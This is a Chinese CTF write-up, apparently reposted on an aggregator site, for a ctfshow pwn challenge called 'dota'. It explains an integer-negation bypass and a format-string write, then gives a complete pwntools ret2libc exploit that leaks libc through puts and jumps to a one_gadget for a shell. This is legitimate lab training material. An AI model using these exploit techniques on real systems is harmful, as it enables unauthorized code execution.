ctfshow 摆烂杯 pwn
2022/1/5 23:08:22
本文主要是介绍ctfshow 摆烂杯 pwn,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
半年没做过pwn题了,试着用这个比赛的题来捡一捡知识点。
dota
main函数中需要绕过两个判断才能进入存在漏洞的函数。
第一个判断很简单,输入“dota”就行了。
第二个判断,需要先让v5小于0,在经过v5=-v5之后,继续让v5小于0,看看汇编是怎么样的。
NEG是汇编指令中的求补指令,对操作数执行求补运算:用零减去操作数,然后结果返回操作数。求补运算也可以表达成:将操作数按位取反后加1。
eax可以容纳4个字节,1个字节由8个二进制位构成。
对于2147483648,可以看到符号位是1,绕过了第一层检测,在执行完neg指令完之后会发现,他的补码还是自己的本身,这样就绕过了第二层检测,就可以进入漏洞函数了。
这个函数就比较简单了,有一个栈上的格式化字符串漏洞,利用这个漏洞修改v1的值让它等于25,然后就可以执行read函数进行溢出了,之后就是常规的ret2libc3了。
# Author:bhxdn www.cnblogs.com/bhxdn/ # Date:2022/1/5 from pwn import * p = process('./pwn') elf = ELF('./pwn') libc = ELF('./libc.so.6') context(os='linux',arch='amd64',log_level='debug') def duan(): gdb.attach(p) pause() p.recvuntil('-\n') p.recvuntil('-\n') payload = 'dota' p.sendline(payload) p.recv() p.sendline('2147483648') p.recvuntil('0x') stack_addr = int(p.recv(12),16) print hex(stack_addr) payload = fmtstr_payload(8,{stack_addr:25}) p.sendline(payload) p.recv() p.recvuntil('\n') pop_rdi = 0x04009b3 puts = elf.plt['puts'] puts_got = elf.got['puts'] return_addr = 0x0400737 payload = 'a'*0x80+'bbbbbbbb'+p64(pop_rdi)+p64(puts_got)+p64(puts)+p64(return_addr) p.send(payload) #leak libc libc_addr = int(u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))) print 'libc_addr-->'+hex(libc_addr) libc_base = libc_addr-libc.symbols['puts'] print 'libc_base-->'+hex(libc_base) og = [0x4f365,0x4f3c2,0x10a45c] shell = libc_base+og[2] p.recvuntil('0x') stack_addr = int(p.recv(12),16) print hex(stack_addr) payload = fmtstr_payload(8,{stack_addr:25}) p.sendline(payload) p.recv() p.recvuntil('\n') payload = 'a'*0x80+'bbbbbbbb'+p64(shell) p.send(payload) p.interactive()
CET4
CET6
未完...
这篇关于ctfshow 摆烂杯 pwn的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23增量更新怎么做?-icode9专业技术文章分享
- 2024-11-23压缩包加密方案有哪些?-icode9专业技术文章分享
- 2024-11-23用shell怎么写一个开机时自动同步远程仓库的代码?-icode9专业技术文章分享
- 2024-11-23webman可以同步自己的仓库吗?-icode9专业技术文章分享
- 2024-11-23在 Webman 中怎么判断是否有某命令进程正在运行?-icode9专业技术文章分享
- 2024-11-23如何重置new Swiper?-icode9专业技术文章分享
- 2024-11-23oss直传有什么好处?-icode9专业技术文章分享
- 2024-11-23如何将oss直传封装成一个组件在其他页面调用时都可以使用?-icode9专业技术文章分享
- 2024-11-23怎么使用laravel 11在代码里获取路由列表?-icode9专业技术文章分享
- 2024-11-22怎么实现ansible playbook 备份代码中命名包含时间戳功能?-icode9专业技术文章分享